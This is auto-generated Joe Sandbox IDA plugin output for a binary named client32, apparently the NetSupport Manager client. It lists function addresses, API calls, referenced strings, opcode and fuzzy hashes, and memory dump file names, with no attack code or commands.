Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
API String ID: 3472027048-2181447511
Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2

Function 1115F274 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1115F295

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
Opcode Fuzzy Hash: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92

Function 00401020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00401024
GetStartupInfoA.KERNEL32(?), ref: 00401079
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
ExitProcess.KERNEL32 ref: 004010A9

Memory Dump Source

Source File: 00000007.00000002.4190536241.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.4190519561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.4190553903.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.4190638856.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D

Function 11131380 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
CreateFontIndirectA.GDI32(?), ref: 111313CF
CreateFontIndirectA.GDI32(?), ref: 111313E5
CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoParametersSystem
String ID:
API String ID: 3386289337-0
Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51

Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
SetFocus.USER32(?), ref: 11007383

Strings

edit, xrefs: 11007321

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_memsetwsprintf
String ID: edit
API String ID: 133491855-2167791130
Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61

Function 1103F270 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5

GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1103F455, 1103F48A
IsA(), xrefs: 1103F45A, 1103F48F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1231476184-2270926670
Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51

Function 110EB740 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,CF3D35D0), ref: 110EAEEC

Part of subcall function 110EB020: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00020019,?,00000000,?,00000000,?,1101726F,CompatibleIDs,?,?,?,?), ref: 110EB03D

wsprintfA.USER32 ref: 110EB855
_free.LIBCMT ref: 110EB8D9

Strings

%s\%s, xrefs: 110EB84F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: OpenQueryValue_freewsprintf
String ID: %s\%s
API String ID: 1875235199-4073750446
Opcode ID: 8086888958b7afde48f2d05ed7d5373e33b6bff6b57ced75fb93385931166be0
Instruction ID: 404d1a134e1187fb309c4f311a08f78a04f8c00206b58903b86036f67e5c1031
Opcode Fuzzy Hash: 8086888958b7afde48f2d05ed7d5373e33b6bff6b57ced75fb93385931166be0
Instruction Fuzzy Hash: 8C514FF5D0162D9EDB21CA54CD84BEEB7B8EB48614F4041E9EA1963241EA306E84CFB5

Function 1109F790 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109F821

Strings

Journal, xrefs: 1109F7D6
JournalPath, xrefs: 1109F7D1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: Journal$JournalPath
API String ID: 1514166925-2350371490
Opcode ID: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
Instruction ID: 434bd909b2f05ad915dc038db26f6da4a37d97d5394bf5eacfbf409b598c8e34
Opcode Fuzzy Hash: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
Instruction Fuzzy Hash: D1414A31E042AE5BD712CF288CA4BDBFFE4EF45744F1045E9D8999B340EA31A908C792

Function 110BD560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130comCOMMON

Download Yara Rule

APIs

Part of subcall function 110758B0: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075905
Part of subcall function 110758B0: GetSysColor.USER32 ref: 11075923
Part of subcall function 110758B0: GetSysColor.USER32(00000014), ref: 1107592A
Part of subcall function 110758B0: GetSysColor.USER32(00000010), ref: 11075931
Part of subcall function 110758B0: GetSysColor.USER32(00000008), ref: 11075938
Part of subcall function 110758B0: GetSysColor.USER32(00000016), ref: 1107593F

Part of subcall function 110AE730: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD632,CF3D35D0,00000000,00000000,00000000,00000000,00000000,111819F4,000000FF,?,1105D27F,?), ref: 110AE741

Part of subcall function 1110D060: GetCurrentThreadId.KERNEL32 ref: 1110D0F6
Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003D0), ref: 1110D109
Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003D0), ref: 1110D118
Part of subcall function 1110D060: EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
Part of subcall function 1110D060: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152

OleInitialize.OLE32(00000000), ref: 110BD6C2

Part of subcall function 110CA340: InterlockedIncrement.KERNEL32(111E2E04), ref: 110CA348
Part of subcall function 110CA340: CoInitialize.OLE32(00000000), ref: 110CA36C

GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD715

Strings

NSMCobrowse, xrefs: 110BD710

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
String ID: NSMCobrowse
API String ID: 2361268844-2243205248
Opcode ID: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
Instruction ID: 226d89ac1b4541342643fefbc1fc1e817936d527e4f01f79d48319a6218e5bfa
Opcode Fuzzy Hash: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
Instruction Fuzzy Hash: 92513778904B85DFD720CFA9C59479EFBE4BF18308F5089ADD4AA93241DB747604CB62

Function 11009220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009295
_memmove.LIBCMT ref: 110092E6

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

string too long, xrefs: 11009290

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0

Function 110394A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 110394CC

Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804

_strtok.LIBCMT ref: 1103959C

Strings

; >, xrefs: 110394C3, 11039595

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd
String ID: ; >
API String ID: 715173073-2207967850
Opcode ID: 915faaa10ea82973ce28d20d980d52b504f97a74c46570bc484437df6252f26a
Instruction ID: f293b488e698f55d2374b640369896eddf6e6b7a39014645c10a29303e9d1088
Opcode Fuzzy Hash: 915faaa10ea82973ce28d20d980d52b504f97a74c46570bc484437df6252f26a
Instruction Fuzzy Hash: F7313B36E1426A6FDB11CFB48C80B9EBBE49F81359F154594DC94AB380F630AD45C7D1

Function 1101F550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 1101F664

Part of subcall function 1115BD70: SetPropA.USER32(00000000,00000000), ref: 1115BD8E
Part of subcall function 1115BD70: SetWindowLongA.USER32(00000000,000000FC,1115B780), ref: 1115BD9F

Part of subcall function 1115AC80: SetPropA.USER32(?,?,?), ref: 1115ACD5

Strings

OnDestroy - delete m_WBFrameWnd, xrefs: 1101F62A
Chat Window Destroyed, xrefs: 1101F57B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
